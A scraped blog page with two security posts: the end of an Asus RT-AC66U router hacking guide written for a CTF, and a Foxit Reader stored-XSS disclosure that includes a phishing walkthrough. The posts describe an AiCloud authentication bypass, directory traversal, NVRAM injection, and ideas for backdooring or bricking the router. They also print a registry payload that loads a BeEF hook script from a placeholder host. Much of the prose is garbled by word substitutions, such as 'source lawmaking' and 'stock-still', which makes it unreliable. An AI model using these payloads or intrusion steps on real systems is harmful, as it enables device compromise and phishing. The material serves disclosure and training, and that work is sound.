href="http://4.bp.blogspot.com/-Iy-d4aCzOyM/U8SttUVo9jI/AAAAAAAAAhA/J3LtPe_xUIY/s1600/wando3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-Iy-d4aCzOyM/U8SttUVo9jI/AAAAAAAAAhA/J3LtPe_xUIY/s1600/wando3.PNG" height="144" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-G30Z95_Mvdo/U8SttI5j-9I/AAAAAAAAAg8/X5-NCZjMSOE/s1600/wando4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-G30Z95_Mvdo/U8SttI5j-9I/AAAAAAAAAg8/X5-NCZjMSOE/s1600/wando4.PNG" height="94" width="320" /></a></div><br />Resume the process (F9) and make an HTTP request to http://192.168.1.1/x.ico. The debugger will stop at the specified breakpoint and you can now inspect the registers and the memory.<br /><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-yRqYbeflB3E/U8Sxnnz9fUI/AAAAAAAAAhg/cEXDC0MUXrc/s1600/ida.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-yRqYbeflB3E/U8Sxnnz9fUI/AAAAAAAAAhg/cEXDC0MUXrc/s1600/ida.png" height="320" width="640" /></a></div><br />If you want to find reverse engineering targets, search for folders named "<i>prebuilt</i>" under "GPL_RT_AC66U_VER3004266/asuswrt/release/src/router/". Some interesting binaries:<br /><br />- /acsd/prebuilt/acsd<br />-&nbsp;/webdav_client/prebuilt/webdav_client<br />-&nbsp;/asuswebstorage/prebuilt/asuswebstorage<br />-&nbsp;/eapd/linux/prebuilt/eapd<br />-&nbsp;/nas/nas/prebuilt/nas<br />-&nbsp;/flash/prebuilt/flash<br />-&nbsp;/et/prebuilt/et<br />-&nbsp;/wps/prebuilt/wps_monitor<br />-&nbsp;/ated/prebuilt/ated<br />-&nbsp;/wlconf/prebuilt/wlconf<br /><br />The mobile AiCloud app might reveal some interesting information well-nigh how the device works. If you reverse the APK or use an intercepting proxy you can identify the app's initial HTTP request:<br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-ZiNm2dt9Ljg/U8S7ESFewQI/AAAAAAAAAiA/z876Z_hWkW8/s1600/aix2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-ZiNm2dt9Ljg/U8S7ESFewQI/AAAAAAAAAiA/z876Z_hWkW8/s1600/aix2.png" height="320" width="192" /></a>&nbsp;<a href="http://1.bp.blogspot.com/-RjgFOaXIO7g/U8S64LqMy4I/AAAAAAAAAh4/Hhu2-hhjJKw/s1600/aix.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-RjgFOaXIO7g/U8S64LqMy4I/AAAAAAAAAh4/Hhu2-hhjJKw/s1600/aix.png" height="320" width="192" /></a></div><div><br /></div><a href="http://2.bp.blogspot.com/-PIisJx8PT7k/U8S4oHh9WhI/AAAAAAAAAhs/8rj3_K9BzB8/s1600/aicl.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-PIisJx8PT7k/U8S4oHh9WhI/AAAAAAAAAhs/8rj3_K9BzB8/s1600/aicl.png" height="240" width="640" /></a></div><div><br /></div><div>You see that strange <i>ddns_hostname</i>? That's a crypto task =)</div><div><br /></div><b>crypto</b><br /><br />The POST request tries to register a new Dynamic DNS using the asuscomm.com service. &nbsp;If we search for the term <i>asuscomm.com</i> on the RT-AC66U source code, we can hands find the function that generates this DDNS:<br /><br /><script src="https://gist.github.com/bmaia/5bad1648d4b2b9a54063.js"></script>Equalto <a href="https://wikidevi.com/wiki/ASUS_RT-AC66U">WikiDevi</a>, the pursuit OUIs are currently stuff used by the RT-AC66U:<br /><br />- 08:60:6E (1 E, 1 W, 2011)<br />-&nbsp;10:BF:48 (1 E, 2 W, 2011)<br />-&nbsp;30:85:A9 (3 E, 3 W, 2011)<br />-&nbsp;50:46:5D (1 E, 2 W, 2012)<br /><br />Using this information we can map the IP write for every single router using AiCloud. Let's generate a list of all the possible MAC addresses and brute gravity the hostnames using <a href="http://www.room362.com/blog/2014/01/29/hostname-bruteforcing-on-the-cheap/">this tomfool trick</a> from <a href="https://twitter.com/mubix">mubix</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-LWWxFquAFck/U8XaiKbybJI/AAAAAAAAAig/m7jEhc8-0CI/s1600/dns1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-LWWxFquAFck/U8XaiKbybJI/AAAAAAAAAig/m7jEhc8-0CI/s1600/dns1.png" height="262" width="400" /></a></div><br />If you're too lazy to run these commands, you can simply search for <i>asuscomm.com</i> on&nbsp;<a href="http://www.shodanhq.com/">Shodan</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-rPvyOwpTtwI/U8Xbnd8yDwI/AAAAAAAAAis/9jZ_xirruJw/s1600/shodan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-rPvyOwpTtwI/U8Xbnd8yDwI/AAAAAAAAAis/9jZ_xirruJw/s1600/shodan.png" height="256" width="400" /></a></div><br />AiCloud runs on ports 8082 and 443 by default. The fact that anyone can hands map the routers running this service could be very worrisome,&nbsp;<a href="http://www.securityfocus.com/archive/1/526942">right</a>?<br /><br />Another interesting crypto exercise is to reverse the algorithm used to generate the WPS device PIN. You can view the currently PIN and secret_code by issuing the&nbsp;following command:&nbsp;<i>nvram show | grep -E "secret_code|wps_device_pin"</i>. Search for these variables in the source lawmaking and use this information to create you own WPS Keygen (don't forget to include a chiptune from <a href="http://pouet.net/">pouet.net</a>).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-NUSQsHW1Df4/U8Xf1oh-HMI/AAAAAAAAAi4/OdvnIaO7AEM/s1600/search.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-NUSQsHW1Df4/U8Xf1oh-HMI/AAAAAAAAAi4/OdvnIaO7AEM/s1600/search.PNG" height="153" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-lR23JSUls-U/U8Xf5UgjxlI/AAAAAAAAAjA/_etmFYePDyI/s1600/generate.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-lR23JSUls-U/U8Xf5UgjxlI/AAAAAAAAAjA/_etmFYePDyI/s1600/generate.PNG" height="276" width="640" /></a></div><br />You can moreover test the entropy from the crypto keys generated by the device.Trammelsthe slides from the "<a href="http://events.ccc.de/congress/2013/Fahrplan/system/attachments/2226/original/Scanning-30c3-13.pdf">Fast Internet-wide Scanning and its Security Applications</a>" to gather some ideas:<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-QEdQ7sANjIE/U8ION_-EpcI/AAAAAAAAAd4/hdS2PPgCLtU/s1600/crypto.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://4.bp.blogspot.com/-QEdQ7sANjIE/U8ION_-EpcI/AAAAAAAAAd4/hdS2PPgCLtU/s1600/crypto.PNG" height="271" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Slides from&nbsp;<a href="https://www.youtube.com/watch?v=K47MZIEXQEI">Fast Internet-wide Scanning and its Security Applications [30c3]</a></td></tr></tbody></table><b>web</b><br /><br />There are so many things to test on the Web using that I'll focus on a few variegated approaches. The router's legalistic interface has no CSRF protection. It has the traditional ping writ injection and lots of XSS vectors.<br /><br />The HTTP daemon is based on microhttpd. It has some vital Directory Traversal Protection on httpd.c:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-MpWpjryIjoQ/U8cvpmeCtZI/AAAAAAAAAkw/ltr3s46Lcyc/s1600/trav1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-MpWpjryIjoQ/U8cvpmeCtZI/AAAAAAAAAkw/ltr3s46Lcyc/s1600/trav1.PNG" height="139" width="640" /></a></div><br />We can shamelessly steal <a href="https://twitter.com/hackerfantastic">hackerfantastic</a>'s <a href="http://www.exploit-db.com/download_pdf/18094/">idea</a>&nbsp;and test for potential bypasses (there's an extensive&nbsp;<a href="https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/JHADDIX_LFI.txt">list of LFI tests</a>&nbsp;at&nbsp;<a href="https://github.com/danielmiessler/SecLists">Seclists</a>):<br /><br /><script src="https://gist.github.com/bmaia/bb787f8092a3a54303c0.js"></script><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-ZeAd-jQzVZU/U8XpWV_acdI/AAAAAAAAAjQ/9O7bmIMf_AE/s1600/traversal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-ZeAd-jQzVZU/U8XpWV_acdI/AAAAAAAAAjQ/9O7bmIMf_AE/s1600/traversal.png" height="261" width="400" /></a></div><br />The web server has some mime handler exceptions that were "supposed to be removed":<br /><br /><script src="https://gist.github.com/bmaia/08e9d6f8dffa84d8bf81.js"></script> get_webdavInfo.asp is wieldy without hallmark and displays lots of sensitive information from the device and the network:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-foKCR53tK-U/U8XvNeGj_5I/AAAAAAAAAjg/DV867YQyA1c/s1600/printe.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-foKCR53tK-U/U8XvNeGj_5I/AAAAAAAAAjg/DV867YQyA1c/s1600/printe.PNG" height="116" width="400" /></a></div><br />We can modify the nvram variables used to exhibit this page and backstairs the router with a XSS payload, for example.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-xoMHBY25H_g/U8XxAnlpNyI/AAAAAAAAAjs/DTDd-mmiqjs/s1600/xss.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-xoMHBY25H_g/U8XxAnlpNyI/AAAAAAAAAjs/DTDd-mmiqjs/s1600/xss.PNG" height="231" width="400" /></a></div><br />Some sensitive operations use the <i>nvram_get</i> and&nbsp;<i>nvram_safe_get</i>&nbsp;function. Some settings are stored using the <i>nvram_set</i> function. If the router does not sanitize the data stuff stored and retrieved from the NVRAM you may perform some kind of NVRAM Injection (remember, 00, %0A, %0D and `reboot` are unchangingly there for you).<br /><br />AiCloud is a *very* vulnerable service that can be <a href="http://www.securityfocus.com/archive/1/526942">easily exploited</a> too. When you vivify the service, the router starts a lighttpd daemon on port 8082 (or 443 on newer firmwares) and offers the option to share your files online. The only caveat is that the username and password screen can be bypassed by visiting the /smb/ URL (read the source, Luke):<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-nKXc5IDsNrw/U8cl9TCCmsI/AAAAAAAAAj8/a06emTmRO_w/s1600/ai1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-nKXc5IDsNrw/U8cl9TCCmsI/AAAAAAAAAj8/a06emTmRO_w/s1600/ai1.PNG" height="300" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-nQpJORCc0CI/U8cl9SFR9yI/AAAAAAAAAkA/28Zu6nD5nPw/s1600/ai2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-nQpJORCc0CI/U8cl9SFR9yI/AAAAAAAAAkA/28Zu6nD5nPw/s1600/ai2.PNG" height="295" width="400" /></a></div><br />I wrote a simple AiCloud crawler that exploits this bug on RT-AC66U v3.0.0.4.266. It lists all the files/paths from the router (including the tying USB devices).<br /><br /><script src="https://gist.github.com/bmaia/9a811b1e9f58e31814d5.js"></script><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-FwEsPtsZOHA/U8cmUp22juI/AAAAAAAAAkU/k7lZCx9zqXo/s1600/x1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-FwEsPtsZOHA/U8cmUp22juI/AAAAAAAAAkU/k7lZCx9zqXo/s1600/x1.png" height="262" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-K1HpUJ9w4ck/U8cmT4s4HsI/AAAAAAAAAkM/BhjJCDxYkc8/s1600/x2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-K1HpUJ9w4ck/U8cmT4s4HsI/AAAAAAAAAkM/BhjJCDxYkc8/s1600/x2.png" height="97" width="400" /></a></div><br />Last, but not least, don't forget to compare the differences between the files in the <i>www</i> directory. This path stores all the web components and scripts used by the web application.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-M0aTvrdkZcA/U8cojRgHHCI/AAAAAAAAAkg/OgIyAanXkDA/s1600/www.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-M0aTvrdkZcA/U8cojRgHHCI/AAAAAAAAAkg/OgIyAanXkDA/s1600/www.png" height="227" width="400" /></a></div><b><br /></b><b>bonus</b><br /><b><br /></b>Why not trying to unshut the hardware specimen without voiding the warranty seal? You may need some tips from the guys at the <a href="http://defcne.net/villages/22/17">DEFCON Tamber Evident Village</a>.<br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-6GPIdP0EoMc/U8K8s4Dn9eI/AAAAAAAAAeI/Zh6K4WAScPk/s1600/tamper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-6GPIdP0EoMc/U8K8s4Dn9eI/AAAAAAAAAeI/Zh6K4WAScPk/s1600/tamper.png" height="400" width="348" /></a></div><br /><br /><b>misc (a.k.a. Conclusion)</b><br /><br />Hacking the Asus RT-AC66U is a very good exercise for the newcomers on router hacking. Most of its source lawmaking is misogynist online and we can hands find lots of exploits and advisories for it. You may not have noticed but we tested every single speciality of the <a href="https://www.owasp.org/index.php/OWASP_Internet_of_Things_Top_Ten_Project#tab=OWASP_Internet_of_Things_Top_10_for_2014">OWASP Internet of Things Top 10</a>. Recent rumors indicate that this router is going to be used as the wiring for the OWASP IoT Webgoat and the Damn Vulnerable Embedded Linux.<br /><br />Some spare approaches you should be taking and that should be awarded uneaten points during the contest:<br /><br /><ul><li>Rewrite the bootloader to create a backdoored dual-boot partition</li><li>Backdoor the device in a way that firmware upgrades won't stupefy it</li><li>Brick the device remotely</li><li>Reprogram the LED to create a PONG game</li></ul><br />There are many things that I still want to write about, but I'm saving that for future posts. If you are going to participate in the&nbsp;<a href="http://sohopelesslybroken.com/">SOHOpelesslyBroken CTF</a>&nbsp;and find this guide useful, finger self-ruling to ping me and let's get a coffee together during DEFCON/BsidesLV/Blackhat =)<br /><br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com8tag:blogger.com,1999:blog-3296471108082693838.post-28710662829523206862014-07-07T10:52:00.000-03:002014-07-16T23:41:20.765-03:00Foxit PDF Reader Stored XSSA friend of mine was performing an external pentest recently and he started to mutter that his traditional Java exploits were not stuff effective. He was worldly-wise to map a few applications and defenses in place protecting the client's network but he still needed an initial wangle to start pivoting.<br /><br />Basic protections like AV, using white-listing as well as increasingly wide &nbsp;ones like EMET are used to make the life of criminals (and pentesters) harder, but they're often bypassed. While discussing alternatives with my friend, he told me that the visitor replaced Adobe Reader without seeing lots of Security Advisories for the product. And what was the replacement? Foxit Reader:<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-zrxieDL32dc/U4AN3DUf3qI/AAAAAAAAAYA/1kw7Idy4zrY/s1600/chart.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-zrxieDL32dc/U4AN3DUf3qI/AAAAAAAAAYA/1kw7Idy4zrY/s1600/chart.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Advisories for Adobe Reader and Foxit Reader listed on <a href="http://www.osvdb.com/">OSVDB</a> (May/2014)</td></tr></tbody></table>Less advisories ways that the product is increasingly secure, right?&nbsp;<a href="https://twitter.com/mruef">Marc Ruef</a>'s talk well-nigh <a href="http://www.scip.ch/publikationen/praesentationen/scip_area41-2014_vuldb.pdf">VDB management</a> summarizes this point:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-1ifAaWVito0/U7bEDcEoc4I/AAAAAAAAAZM/NWwe6fG7ENg/s1600/talk.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-1ifAaWVito0/U7bEDcEoc4I/AAAAAAAAAZM/NWwe6fG7ENg/s1600/talk.PNG" height="368" width="640" /></a></div><br />The moment I throne the word Foxit Reader I remembered of an old exploit I created a long time ago. The vulnerability wasn't that hair-trigger but I knew that it would fit for the situation (and for this blog post).<br /><div style="text-align: left;"><br /></div>As I was well-nigh to unroll it publicly I notified the vendor and waited for them to patch it. I had some problems with their security contact and had to mail them twice, but they answered without a couple of days, patching the product and releasing an newsy (no CVE is prescribed for this vulnerability as the time of writing).<br /><br /><b>Security Advisory</b><br /><b><br /></b><a href="http://www.foxitsoftware.com/support/security_bulletins.php#FRD-21">http://www.foxitsoftware.com/support/security_bulletins.php#FRD-21</a><br /><br /><b>Fixed a security issue caused by the Stored XSS vulnerability when reading and displaying filenames and their paths on the “Recent Documents” section from the Start Page.</b><br /><br /><b>Summary</b><br /><b><br /></b>Foxit Reader 6.2.1, Foxit Enterprise Reader 6.2.1, and Foxit PhantomPDF 6.2.1 stock-still a security issue caused by the Stored XSS vulnerability when reading and displaying filenames and their paths on the “Recent Documents” section from the Start Page. Attackers could tamper with the registry entry and rationalization the using to load malicious files.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-n2BF95xIeCo/U7bHkb8bv-I/AAAAAAAAAZk/LSUOzDcX1Xc/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-n2BF95xIeCo/U7bHkb8bv-I/AAAAAAAAAZk/LSUOzDcX1Xc/s1600/1.PNG" height="307" width="400" /></a></div><br />When opening a PDF, Foxit creates a "FileX" registry entry with the document's well-constructed path:<br /><div><div><br /></div><div>[HKEY_CURRENT_USER\Software\Foxit Software\Foxit Reader 6.0\Recent File List]</div><div>"File1"="C:\\w00t.pdf"</div><div><br /></div><div>Whenever you unshut a document, Foxit 6.x displays the start panel on a variegated tab by default. All you need to do is edit the registry and place your XSS payload (or the <a href="http://beefproject.com/">BeEF</a> hook) on the FileX entry:</div><br /><div class="code">C:\Users\Admin\Desktop&gt;type reg.reg<br /><br />Windows Registry Editor Version 5.00<br /><br />[HKEY_CURRENT_USER\Software\Foxit Software\Foxit Reader 6.0\Recent File List]<br />"File1"="C:\\w00t.pdf&lt;script src=\"http://BEEF/hook.js\"&gt;&lt;/script&gt;"<br /><br />C:\Users\Admin\Desktop&gt;reg import reg.reg<br />The operation completed successfully.</div><div><br /></div><div>Now wait for the victim to unshut any PDF File (using Foxit Reader):<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-xhCnoUhCTEE/U7bHkSWbTRI/AAAAAAAAAZY/s8nFjjoH6hQ/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-xhCnoUhCTEE/U7bHkSWbTRI/AAAAAAAAAZY/s8nFjjoH6hQ/s1600/2.PNG" height="227" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-WppQZMm0eqE/U7bHk2kLLXI/AAAAAAAAAZg/S-s1clypWyQ/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-WppQZMm0eqE/U7bHk2kLLXI/AAAAAAAAAZg/S-s1clypWyQ/s1600/3.PNG" height="306" width="400" /></a></div><b><br /></b><b>Affected Versions</b></div></div><br />Foxit Reader 6.2.0.0429 and earlier<br />Foxit Enterprise Reader 6.2.0.0429 and earlier<br />Foxit PhantomPDF 6.2.0.0429 and earlier<br /><br /><b>Solution</b><br /><br />Upgrade to Foxit Reader 6.2.1, Foxit Enterprise Reader 6.2.1, or Foxit PhantomPDF 6.2.1.<br /><br /><b>Security Process</b><br /><br />2014-05-24: <a href="https://twitter.com/bernardomr">Bernardo Rodrigues</a> found the issue;<br />2014-06-03:CadreSecurity Technologies confirmed the issue;<br />2014-06-11: Foxit stock-still the issue;<br />2014-07-01: Foxit released stock-still version of Foxit Reader 6.2.1/Foxit Enterprise Reader 6.2.1/Foxit PhantomPDF 6.2.1.<br /><div><br /><b>Foxit Reader XSS + Phishing</b><br /><b><br /></b>I know, the bug does not seem to be that good and would have no use during a pentest engagement. When I first found this flaw, I could basically think of three ways to compromise the user's Foxit Reader installation:<br /><br /><b>1 - Sending a PDF with the XSS payload on the filename</b><br /><br />That would be the platonic solution but I was unable to craft a file with the XSS payload and unshut it on a Windows System. Microsoft Windows won't create filenames with special chars like &lt;, &gt; and / so I booted my Linux VM, created a file tabbed &lt;plaintext&gt;.pdf and compressed it into test.zip.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-U9nIFVtFjNM/U7bxRv3MOMI/AAAAAAAAAaI/MCB9ZjrxvsA/s1600/x2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-U9nIFVtFjNM/U7bxRv3MOMI/AAAAAAAAAaI/MCB9ZjrxvsA/s1600/x2.PNG" height="228" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-CuJiLc4Cwwg/U7bxRtsCzdI/AAAAAAAAAaM/hPzRmw4KGE4/s1600/x1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-CuJiLc4Cwwg/U7bxRtsCzdI/AAAAAAAAAaM/hPzRmw4KGE4/s1600/x1.PNG" height="245" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-fsZFFMlx1iQ/U7bxRtDwPPI/AAAAAAAAAaE/rMjeYDQegPk/s1600/x3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-fsZFFMlx1iQ/U7bxRtDwPPI/AAAAAAAAAaE/rMjeYDQegPk/s1600/x3.PNG" height="182" width="400" /></a></div><br />When double clicking the file on WinRAR, the OS won't unshut it. If we stilt it to the Foxit Reader Window, the special chars are replaced and the XSS payload won't load.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-61D0XLc1_cU/U7bxSCFCMYI/AAAAAAAAAaY/64S7xiK0n1U/s1600/x4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-61D0XLc1_cU/U7bxSCFCMYI/AAAAAAAAAaY/64S7xiK0n1U/s1600/x4.PNG" height="140" width="320" /></a></div><br />I tried to use volitional encodings and variegated XSS vectors, but I could't exploit it properly on Windows. If you have any largest idea please <a href="https://twitter.com/bernardomr">let me know</a>.<br /><br /><b>2 - Send a .reg to the user and ask him to double click it</b><br /><br />Most people won't click on executable attachments on e-mails: that's why <a href="http://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-cpl-malware/">Brazilian criminals distribute malware using CPL files</a>, for example. Some e-mail providers like Outlook woodcut .reg attachments, but many other services like Gmail won't woodcut them:<br /><br />Registry file obstructed on Outlook:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-jC4wUmeHBeg/U7ckqmazvmI/AAAAAAAAAa4/HsV3MHk_cSs/s1600/outlook.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-jC4wUmeHBeg/U7ckqmazvmI/AAAAAAAAAa4/HsV3MHk_cSs/s1600/outlook.PNG" /></a></div>Registry File zipper on Gmail:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-qBGVXr5jaI4/U7ckqkn98xI/AAAAAAAAAa0/MjJsz3j1xg4/s1600/gmail.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-qBGVXr5jaI4/U7ckqkn98xI/AAAAAAAAAa0/MjJsz3j1xg4/s1600/gmail.PNG" height="182" width="320" /></a></div><br /><b>3 - Embed the .reg object on a RTF or Word Document and instruct the user to run it</b><br /><br />There's a video for this one, featuring <a href="http://beefproject.com/">BeEF</a>, your favorite <strike>Browser</strike>&nbsp;PDF Reader Exploitation Framework Project &nbsp;=)<br /><div style="text-align: center;"><br /></div><div style="text-align: center;"><iframe allowfullscreen="yes" frameborder="0" height="344" src="//www.youtube.com/embed/74OgNhCDGKo" width="459"></iframe><br /></div><div style="text-align: center;"><br /></div><div style="text-align: left;">The interesting part here is that the PDF Reader is not subject to the Same-Origin Policy and the vaccinate can be used as reliable proxy to the internal network.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-EN5jF73zxe0/U7jlCSfP9MI/AAAAAAAAAbM/trS-1AU-6h4/s1600/vid3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-EN5jF73zxe0/U7jlCSfP9MI/AAAAAAAAAbM/trS-1AU-6h4/s1600/vid3.PNG" height="176" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>This is moreover one of the rare scenarios where you can run "localhost" exploits from BeEF, as long as the user accepts the prompted ActiveX warning:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-cmpWo39DYss/U7jlkb-8WKI/AAAAAAAAAbY/H2exF6rzBiQ/s1600/vid1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-cmpWo39DYss/U7jlkb-8WKI/AAAAAAAAAbY/H2exF6rzBiQ/s1600/vid1.PNG" height="154" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-j5FdyX3pdiM/U7jlkgQoK3I/AAAAAAAAAbc/ZqwHHc779rs/s1600/vid2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-j5FdyX3pdiM/U7jlkgQoK3I/AAAAAAAAAbc/ZqwHHc779rs/s1600/vid2.PNG" height="396" width="640" /></a></div><br /><br /><b>Conclusion</b></div><div><b><br /></b>You may be asking "why not embed a malware on the document?". Firstly considering this is a noisy technique and most AV/whitelisting products would snift this attempt. You could moreover modify the user's registry to&nbsp;<a href="http://www.shelliscoming.com/2013/12/metasploit-controlling-internet.html">load a PAC file on the browser</a>&nbsp;or use powershell scripts to shirk some restrictions, but in this specimen there would be no need for this blog post =)<br /><br /></div><div>It doesn't matter how secure your product is or how much vulnerabilities were disclosed for it: if you're targeted by big Offensive players, you're certainly getting pwned. If other less sophisticated attackers want to wade you, they'll pwn you as well, considering people still fall for phishing.<br /><br />What makes your security posture largest is how you snift and respond to these threats. I like approaches like the one described by Haifei Li &amp; Chong Xu at CanSecWest 2014. Their talk on <a href="https://cansecwest.com/slides/2014/Exploit%20detection%20-%20Exploring_In_the_Wild_final.pdf">Exploit Detection</a> described how "DNA comparison" can be used to flag and snift application's unusual behavior, leading to exploit discovery:<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-m6liIg33FA4/U7bLcQ6xvHI/AAAAAAAAAZ0/oGcLyHrRuD4/s1600/slides.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-m6liIg33FA4/U7bLcQ6xvHI/AAAAAAAAAZ0/oGcLyHrRuD4/s1600/slides.PNG" height="235" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://cansecwest.com/slides/2014/Exploit%20detection%20-%20Exploring_In_the_Wild_final.pdf">Exploit Detection</a>, Haifei Li &amp; Chong Xu (CanSecWest 2014)</td></tr></tbody></table><br />In this simple phishing scenario, Microsoft Word (and WordPad) drops a registry file on the %TEMP% folder as soon as the file is opened. This is unmistakably an unusual policies and should be flagged by security solutions. This could moreover be used as an IOC to unriddle big sets of files/documents.<br /><br /><a href="https://twitter.com/randomdross">David Ross</a>&nbsp;made a post recently describing lots of 